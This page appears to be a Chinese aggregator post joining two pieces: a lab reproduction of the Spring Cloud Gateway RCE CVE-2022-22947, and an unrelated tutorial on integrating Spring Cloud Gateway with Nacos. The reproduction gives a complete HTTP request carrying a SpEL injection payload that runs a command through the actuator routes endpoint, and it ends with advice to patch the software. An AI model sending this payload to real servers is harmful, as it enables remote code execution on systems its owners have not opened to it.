Spring Cloud Gateway RCE (CVE-2022-22947)漏洞复现

Posted 种树人1

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Spring Cloud Gateway RCE (CVE-2022-22947)漏洞复现相关的知识,希望对你有一定的参考价值。

一 简介

Spring Cloud Gateway 是Spring Cloud的一个全新的API网关项目,目的是为了替换掉Zuul1。Gateway可以与Spring Cloud Discovery Client(如Eureka)、Ribbon、Hystrix等组件配合使用,实现路由转发、负载均衡、熔断等功能,并且Gateway还内置了限流过滤器,实现了限流的功能。

二 漏洞原理

Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执行任意远程执行的请求

详细分析:

漏洞分析: CVE-2022-22947 Spring Cloud Gateway - 知乎 (zhihu.com)

三 漏洞复现

        1.环境搭建

                这里使用docker去搭建,使用以下命令

docker pull vulhub/spring-cloud-gateway:3.1.0     //下载镜像

docker run -itd -p 8010:8080 --name spring vulhub/spring-cloud-gateway:3.1.0   //启动 

出现以下图片说明搭建成功

 

        2.漏洞复现

                1.添加一个spel表达式路由,修改处已在图中标出

POST /actuator/gateway/routes/xd HTTP/1.1
Host: 192.168.1.153:8010
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Type: application/json
Content-Length: 364


      "id": "xd",
      "filters": [
        "name": "AddResponseHeader",
        "args": "name": "Result","value": "#new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]\\"whoami\\").getInputStream()))"
        ],
      "uri": "http://example.com",
      "order": 0
   

                 2.添加完路由之后,接下来就是触发路由,直接在url处拼接/actuator/gateway/refresh

                3.访问刚刚添加的路由,payload中执行的命令,即可回显

四 漏洞修复 

更新升级 Spring Cloud Gateway 到以下安全版本:

Spring Cloud Gateway 3.1.1

Spring Cloud Gateway 3.0.7

如果网站业务不会使用到Actuator组件就可以将它禁用。

Spring Cloud Gateway集成

本章会结合【java_wxid项目】【第五章】【Spring Cloud Hystrix集成】的spring-cloud-hystrix-demo项目进行demo演示

文章目录

创建spring-cloud-gateway-demo项目

项目结构如下(示例):

修改pom.xml

代码如下(示例):

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>com.example</groupId>
    <artifactId>spring-cloud-gateway-demo</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>spring-cloud-gateway-demo</name>
    <description>Demo project for Spring Boot</description>

    <!--    属性配置-->
    <properties>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
        <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
        <java.version>1.8</java.version>
        <!--引入 Spring BootSpring CloudSpring Cloud Alibaba 三者 BOM 文件,进行依赖版本的管理,防止不兼容。
        在 https://dwz.cn/mcLIfNKt 文章中,Spring Cloud Alibaba 开发团队推荐了三者的依赖关系-->
        <spring.boot.version>2.3.12.RELEASE</spring.boot.version>
        <spring.cloud.version>Hoxton.SR12</spring.cloud.version>
        <spring.cloud.alibaba.version>2.2.7.RELEASE</spring.cloud.alibaba.version>
    </properties>

    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter</artifactId>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>

        <!--        代表web模块,在这个模块中含了许多JAR包,有spring相关的jar,内置tomcat服务器,jackson等,这些web项目中常用的的功能都会自动引入-->
<!--        <dependency>-->
<!--            <groupId>org.springframework.boot</groupId>-->
<!--            <artifactId>spring-boot-starter-web</artifactId>-->
<!--        </dependency>-->

        <!-- Alibaba Nacos 配置 -->
        <dependency>
            <groupId>com.alibaba.cloud</groupId>
            <artifactId>spring-cloud-starter-alibaba-nacos-discovery</artifactId>
        </dependency>
        <dependency>
            <groupId>com.alibaba.cloud</groupId>
            <artifactId>spring-cloud-starter-alibaba-nacos-config</artifactId>
        </dependency>
        <!--SpringBoot 2.4.x的版本之后,对于bootstrap.properties/bootstrap.yaml配置文件
        (我们合起来成为Bootstrap配置文件)的支持,其实这个jar包里什么都没有,
        就只有一个标识类Marker,用来标识要开启Bootstrap配置文件的支持,由于父类用了2.5.6版本需要导入如下的依赖-->
        <dependency>
            <groupId>org.springframework.cloud</groupId>
            <artifactId>spring-cloud-starter-bootstrap</artifactId>
            <version>3.1.0</version>
        </dependency>

        <!--        网关配置-->
        <dependency>
            <groupId>org.springframework.cloud</groupId>
            <artifactId>spring-cloud-starter-gateway</artifactId>
        </dependency>
<!--        spring cloud gateway是基于webflux的,如果非要web支持的话需要导入spring-boot-starter-webflux,
而不是spring-boot-start-web。-->
<!--        <dependency>-->
<!--            <groupId>org.springframework.boot</groupId>-->
<!--            <artifactId>spring-boot-starter-webflux</artifactId>-->
<!--        </dependency>-->

    </dependencies>


    <!--
        引入 Spring BootSpring CloudSpring Cloud Alibaba 三者 BOM 文件,进行依赖版本的管理,防止不兼容。
        在 https://dwz.cn/mcLIfNKt 文章中,Spring Cloud Alibaba 开发团队推荐了三者的依赖关系
     -->
    <dependencyManagement>
        <dependencies>
            <dependency>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-starter-parent</artifactId>
                <version>$spring.boot.version</version>
                <type>pom</type>
                <scope>import</scope>
            </dependency>
            <dependency>
                <groupId>org.springframework.cloud</groupId>
                <artifactId>spring-cloud-dependencies</artifactId>
                <version>$spring.cloud.version</version>
                <type>pom</type>
                <scope>import</scope>
            </dependency>
            <dependency>
                <groupId>com.alibaba.cloud</groupId>
                <artifactId>spring-cloud-alibaba-dependencies</artifactId>
                <version>$spring.cloud.alibaba.version</version>
                <type>pom</type>
                <scope>import</scope>
            </dependency>
        </dependencies>
    </dependencyManagement>


    <build>
        <plugins>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-compiler-plugin</artifactId>
                <version>2.4</version>
                <configuration>
                    <source>$java.version</source>
                    <target>$java.version</target>
                    <encoding>$project.build.sourceEncoding</encoding>
                </configuration>
            </plugin>
        </plugins>
    </build>

</project>

创建bootstrap.yml文件

代码如下(示例):

#bootstrap.yml优先级比application.yml优先级高
spring:
  #prefix−spring.profile.active.$file-extension
  #nacos会根据当前环境去拼接配置名称查找相应配置文件,
  #示例:spring.application.name-spring.profiles.active-spring.cloud.nacos.config.file-extension
  #获取到值:nacos-autoconfig-service-dev.yml
  profiles:
    #开发环境dev,测试环境test,生产环境prod
    active: dev
  application:
    #配置应用的名称,用于获取配置
    name: gateway-demo
  cloud:
    nacos:
      discovery:
        # 服务注册地址
        server-addr: 106.14.132.94:8848
      config:
        #nacos配置中心地址
        server-addr: 106.14.132.94:8848
        #配置中心的命名空间id
        namespace: 9e50b6d9-6c3d-4e7a-b701-10f085e4b98d
        #配置分组,默认没有也可以
        group: DEFAULT_GROUP
        #配置文件后缀,用于拼接配置配置文件名称,目前只支持yaml和properties
        file-extension: yaml
        #配置自动刷新
        refresh-enabled: true
        #配置文件的前缀,默认是application.name的值,如果配了prefix,就取prefix的值
        #prefix: nacos-autoconfig-service-$spring.profile.active
        # 配置编码
        encode: UTF-8
        username: nacos
        password: nacos
    gateway:
      discovery:
        locator:
          enabled: false
          lowerCaseServiceId: true
      routes:
        - id: hystrix-route   #路由的ID,没有固定规则但要求唯一,建议配合服务名
          uri: lb://hystrix-demo #nacos的服务名称,匹配后提供服务的路由地址,也可以用uri: http://localhost:8805/
          predicates:
            - Path=/hystrix-demo/**         # 断言,路径相匹配的进行路由
          filters:
            - StripPrefix=1 #去掉服务名前缀

修改启动类SpringCloudGatewayDemoApplication

代码如下(示例):

package com.example.springcloudgatewaydemo;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.cloud.client.discovery.EnableDiscoveryClient;
import org.springframework.cloud.client.loadbalancer.LoadBalanced;
import org.springframework.context.annotation.Bean;
import org.springframework.web.client.RestTemplate;

@EnableDiscoveryClient
@SpringBootApplication
public class SpringCloudGatewayDemoApplication 

    public static void main(String[] args) 
        SpringApplication.run(SpringCloudGatewayDemoApplication.class, args);
    

    @Bean
    @LoadBalanced
    RestTemplate restTemplate() 
        return new RestTemplate();
    


校验gateway是否工作

启动spring-cloud-hystrix-demo项目、spring-cloud-gateway-demo项目
如下图(示例):

正常调用spring-cloud-hystrix-demo的接口,是这样的,请求地址:
如下图(示例):


使用网关之后的请求地址:http://localhost:8806/hystrix-demo/hystrix/getNacosConfigure
如下图(示例):



可以发现已经经过网关分发到具体的服务了,gateway起作用了

以上是关于Spring Cloud Gateway RCE (CVE-2022-22947)漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)

聊聊spring cloud gateway的NettyConfiguration

Spring Cloud实战Spring Cloud GateWay服务网关

spring cloud gateway 如何工作

Spring Cloud Gateway集成

spring cloud gateway 的执行流程